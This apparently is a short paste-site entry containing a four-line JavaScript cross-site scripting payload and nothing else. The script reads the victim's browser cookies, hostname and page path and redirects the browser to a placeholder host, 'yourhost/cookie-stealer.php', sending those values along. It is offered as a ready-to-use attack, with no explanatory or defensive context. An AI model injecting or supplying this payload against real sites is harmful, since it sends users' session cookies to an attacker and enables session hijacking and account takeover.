SHOW:
|
|
- or go back to the newest paste.
| 1 | <script type="text/javascript"> | |
| 2 | var url = 'http://yourhost/cookie-stealer.php'+'?c='+document.cookie+'&w='+document.location.hostname+'&p='+document.location.pathname; | |
| 3 | document.location = url; | |
| 4 | </script> |